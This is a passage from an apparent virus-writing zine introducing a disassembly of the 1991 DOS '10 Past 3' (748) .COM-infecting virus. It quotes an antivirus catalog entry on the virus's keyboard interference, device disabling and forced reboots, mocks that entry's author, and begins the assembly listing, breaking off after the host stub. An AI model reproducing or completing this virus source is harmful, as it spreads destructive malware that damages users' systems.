By The Attitude Adjuster
============================

Well... I was bored, and, I am still relatively bad at doing disassemblies, so, I thought I'd do a seemingly interesting virus, and do it well... First, what Patti says...
===========================================================================
Virus Name:  10 Past 3
Aliases:     748
V Status:    Rare
Discovery:   1991
Symptoms:    .COM file growth; keyboard keypresses altered; system reboots; hardware devices disabled or interference
Origin:      Unknown
Eff Length:  748 Bytes
Type Code:   PRaCK - Parasitic Resident .COM Infector
Detection Method: CPAV 1.4+, AVTK 6.0+, F-Prot, IBMAV, Iris, Panda, VNet, VBuster 3.93+, ViruScan V99+, Sweep 2.43a+, Trend, AllSafe, ViruSafe, NAV 2.1.2+, UTScan 25.10+, Vi-Spy, CPAV/N, LProt, NShld V99+, Sweep/N
Removal Instructions: Delete infected files

General Comments:
The 10 Past 3, or 748, virus was submitted in November, 1992. This virus was actually isolated much earlier, in early 1991. 10 Past 3 is a memory resident infector of .COM programs, including COMMAND.COM.

The first time a program infected with the 10 Past 3 virus is executed, this virus will install itself memory resident in low available system memory, hooking interrupts 21 and 6B. Total system and available free memory, as measured by the DOS CHKDSK program, will not be altered.

Once the 10 Past 3 virus is memory resident, it will infect .COM programs, including COMMAND.COM, when they are executed. Infected programs will have a file length increase of 748 bytes with the virus being located at the end of the file. The program's date and time in the DOS disk directory listing will not be altered. No text strings are visible within the viral code.

The 10 Past 3 virus activates between 15:10 and 15:13 (3:00PM and 3:15PM) every day, at which time it will cause the "Ctrl" or "Shift" keys to be invoked occasionally when the system user enters a character on the system keyboard. As a result, the character input may not be the same as what the user intended.
Additionally, it either disables or interferes with the functioning of the following devices on the days of any month indicated below:

    1st day of any month  - keyboard
    10th day of any month - system hard disk
    16th day of any month - system monitor/display
    29th day of any month - disk drives

On the 22nd day of any month, unexpected system reboots may occur.

Known variant(s) of 10 Past 3 are:
10 Past 3-B: A 789 byte variant of the 10 Past 3 virus, this variant adds 789 bytes to the .COM programs it infects, including COMMAND.COM. It will occasionally display the following text on the system monitor: "Therese" The text is visible within the viral code in all 10 Past 3-B infected programs. Origin: Republic Of South Africa January, 1993.
===========================================================================

Now, allow me to quote from the woman who can't write...

    'The 10 Past 3 virus activates between 15:10 and 15:13 (3:00PM and
     3:15PM) every day, at which time it will cause the "Ctrl" or "Shift"'

Sheesh, Patti, grow a little programming knowledge, and maybe learn how to read military time! Anyway, here's the code, hope you like it... I found it to be a thoroughly boring piece of code, 'cept for a few little things, just angles I had yet to look from... As always, this is byte for byte with the sample that I worked from... Scans as it, must be it ("Look man, RedX!" Ha!)...

===========================================================================
        .model  tiny
        .code
; 10 Past 3, Disassembly done by The Attitude Adjuster for ID Issue 3.
; All hail the holy XCHG AX,AX!
        org     100h
start:
        db      0E9h, 1Dh, 00           ; jmp near intovirus
        db      0B4h, 09h               ; mov ah, 9
        int     21h
        int     20h
        nop                             ; F!#K
        nop                             ; F!#K
        nop                             ; F!#K
        nop                             ; F!#K
        nop                             ; F!#K
        nop                             ; F!#K
        nop                             ; F!#K
hello   db      'Hello world !', 0Dh, 0Ah, '